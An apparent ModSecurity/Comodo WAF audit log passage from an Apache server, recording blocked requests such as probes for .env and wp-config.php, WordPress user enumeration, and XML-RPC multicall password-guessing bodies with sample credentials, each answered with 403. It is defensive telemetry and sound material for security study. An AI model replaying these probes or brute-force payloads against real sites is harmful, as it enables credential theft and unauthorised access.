denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748059270353628 2557 (- - -) Stopwatch2: 1748059270353628 2557; combined=1251, p1=376, p2=843, p3=0, p4=0, p5=31, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84d83b4c-Z-- --fe706244-A-- [24/May/2025:11:03:27 +0700] aDFFD-unkxaVeh4Nwhaz7AAAAFA 103.236.140.4 36552 103.236.140.4 8181 --fe706244-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.81.24.227 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.81.24.227 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --fe706244-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe706244-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748059407513638 983 (- - -) Stopwatch2: 1748059407513638 983; combined=386, p1=344, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe706244-Z-- --0753dc32-A-- [24/May/2025:11:24:24 +0700] aDFJ-Pmzt4abyoi_U9nrtQAAAIs 103.236.140.4 53152 103.236.140.4 8181 --0753dc32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.252.67.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.252.67.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0753dc32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0753dc32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748060664938483 3460 (- - -) Stopwatch2: 1748060664938483 3460; combined=1551, p1=485, p2=1015, p3=0, p4=0, p5=50, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0753dc32-Z-- --957dd677-A-- [24/May/2025:11:42:10 +0700] aDFOIuunkxaVeh4NwhbNOgAAAFU 103.236.140.4 35936 103.236.140.4 8181 --957dd677-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 66.181.166.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 66.181.166.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --957dd677-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --957dd677-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748061730669940 2987 (- - -) Stopwatch2: 1748061730669940 2987; combined=1425, p1=479, p2=913, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --957dd677-Z-- --b53ad81a-A-- [24/May/2025:11:42:39 +0700] aDFOP_mzt4abyoi_U9nxjQAAAIg 103.236.140.4 35984 103.236.140.4 8181 --b53ad81a-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b53ad81a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b53ad81a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748061759478213 4130 (- - -) Stopwatch2: 1748061759478213 4130; combined=3627, p1=3504, p2=0, p3=0, p4=0, p5=123, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b53ad81a-Z-- --942c1f46-A-- [24/May/2025:11:49:00 +0700] aDFPvPmzt4abyoi_U9nxuAAAAJI 103.236.140.4 36150 103.236.140.4 8181 --942c1f46-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 84.247.188.52 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 84.247.188.52 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --942c1f46-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin$321 --942c1f46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --942c1f46-E-- --942c1f46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 84.247.188.52 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748062140113633 6218 (- - -) Stopwatch2: 1748062140113633 6218; combined=4373, p1=536, p2=3663, p3=0, p4=0, p5=104, sr=109, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --942c1f46-Z-- --fbf9472e-A-- [24/May/2025:11:49:43 +0700] aDFP5_mzt4abyoi_U9nxvwAAAIs 103.236.140.4 36172 103.236.140.4 8181 --fbf9472e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 122.117.102.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 122.117.102.125 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fbf9472e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix!@# --fbf9472e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbf9472e-E-- --fbf9472e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 122.117.102.125 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748062183775835 5042 (- - -) Stopwatch2: 1748062183775835 5042; combined=3813, p1=407, p2=3238, p3=0, p4=0, p5=100, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbf9472e-Z-- --7d614374-A-- [24/May/2025:11:53:53 +0700] aDFQ4fmzt4abyoi_U9nx1AAAAJQ 103.236.140.4 36232 103.236.140.4 8181 --7d614374-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 122.117.102.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 122.117.102.125 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7d614374-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin07 --7d614374-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d614374-E-- --7d614374-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 122.117.102.125 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748062433835206 5537 (- - -) Stopwatch2: 1748062433835206 5537; combined=3847, p1=477, p2=3180, p3=0, p4=0, p5=114, sr=86, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d614374-Z-- --9f28905c-A-- [24/May/2025:11:55:55 +0700] aDFRW-unkxaVeh4NwhbNSwAAAEA 103.236.140.4 36280 103.236.140.4 8181 --9f28905c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 122.117.102.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 122.117.102.125 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9f28905c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihin[_host_]-solihin --9f28905c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f28905c-E-- --9f28905c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 122.117.102.125 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748062555909773 4419 (- - -) Stopwatch2: 1748062555909773 4419; combined=3402, p1=393, p2=2880, p3=0, p4=0, p5=76, sr=66, sw=53, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f28905c-Z-- --41909e51-A-- [24/May/2025:12:03:44 +0700] aDFTMPmzt4abyoi_U9nyAwAAAIs 103.236.140.4 36392 103.236.140.4 8181 --41909e51-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 141.170.146.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.170.146.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --41909e51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41909e51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748063024049997 3370 (- - -) Stopwatch2: 1748063024049997 3370; combined=1491, p1=499, p2=954, p3=0, p4=0, p5=37, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41909e51-Z-- --c8b9573e-A-- [24/May/2025:12:15:15 +0700] aDFV4-O2UzDOKMmK0i6cdgAAAAw 103.236.140.4 36582 103.236.140.4 8181 --c8b9573e-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 159.89.127.165 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c8b9573e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8b9573e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748063715456752 970 (- - -) Stopwatch2: 1748063715456752 970; combined=350, p1=305, p2=0, p3=0, p4=0, p5=45, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8b9573e-Z-- --b41d3b5d-A-- [24/May/2025:12:19:51 +0700] aDFW9-O2UzDOKMmK0i6ciQAAAAw 103.236.140.4 36674 103.236.140.4 8181 --b41d3b5d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.194.217.18 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.194.217.18 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b41d3b5d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin8 --b41d3b5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b41d3b5d-E-- --b41d3b5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.194.217.18 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748063991282255 6020 (- - -) Stopwatch2: 1748063991282255 6020; combined=4254, p1=524, p2=3560, p3=0, p4=0, p5=103, sr=91, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b41d3b5d-Z-- --8af2904f-A-- [24/May/2025:12:33:28 +0700] aDFaKOunkxaVeh4NwhbNhAAAAEY 103.236.140.4 37008 103.236.140.4 8181 --8af2904f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8af2904f-C-- system.multicallmethodNamewp.getUsersBlogsparamssuperadminantix789 --8af2904f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8af2904f-E-- --8af2904f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748064808446535 19972 (- - -) Stopwatch2: 1748064808446535 19972; combined=31602, p1=503, p2=3746, p3=0, p4=0, p5=13693, sr=94, sw=67, l=0, gc=13593 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8af2904f-Z-- --812dd259-A-- [24/May/2025:12:33:56 +0700] aDFaROunkxaVeh4NwhbNigAAAFU 103.236.140.4 37028 103.236.140.4 8181 --812dd259-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 122.117.102.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 122.117.102.125 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --812dd259-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix!@#$% --812dd259-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --812dd259-E-- --812dd259-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 122.117.102.125 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748064836288926 5783 (- - -) Stopwatch2: 1748064836288926 5783; combined=4130, p1=543, p2=3415, p3=0, p4=0, p5=102, sr=135, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --812dd259-Z-- --0d3c4404-A-- [24/May/2025:12:34:50 +0700] aDFaevmzt4abyoi_U9nyVAAAAJE 103.236.140.4 37066 103.236.140.4 8181 --0d3c4404-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0d3c4404-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix10 --0d3c4404-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d3c4404-E-- --0d3c4404-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748064890910647 5648 (- - -) Stopwatch2: 1748064890910647 5648; combined=3954, p1=463, p2=3318, p3=0, p4=0, p5=101, sr=86, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d3c4404-Z-- --77b9d724-A-- [24/May/2025:13:11:22 +0700] aDFjCvmzt4abyoi_U9n7kgAAAIg 103.236.140.4 46544 103.236.140.4 8181 --77b9d724-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1 Accept-Charset: utf-8 --77b9d724-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77b9d724-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748067082334431 657 (- - -) Stopwatch2: 1748067082334431 657; combined=270, p1=240, p2=0, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77b9d724-Z-- --a1348a28-A-- [24/May/2025:13:15:52 +0700] aDFkGDvI5DIWBJ2mFG5JjAAAAMs 103.236.140.4 46982 103.236.140.4 8181 --a1348a28-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 128.199.182.152 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 128.199.182.152 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a1348a28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1348a28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748067352094371 768 (- - -) Stopwatch2: 1748067352094371 768; combined=288, p1=251, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1348a28-Z-- --c3c46544-A-- [24/May/2025:13:19:56 +0700] aDFlDPmzt4abyoi_U9n8_QAAAIo 103.236.140.4 47836 103.236.140.4 8181 --c3c46544-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 143.198.197.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.197.57 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36 Accept: */* --c3c46544-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3c46544-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748067596255871 736 (- - -) Stopwatch2: 1748067596255871 736; combined=261, p1=226, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3c46544-Z-- --5e22ba7f-A-- [24/May/2025:13:35:25 +0700] aDForTvI5DIWBJ2mFG5KrAAAAMU 103.236.140.4 49966 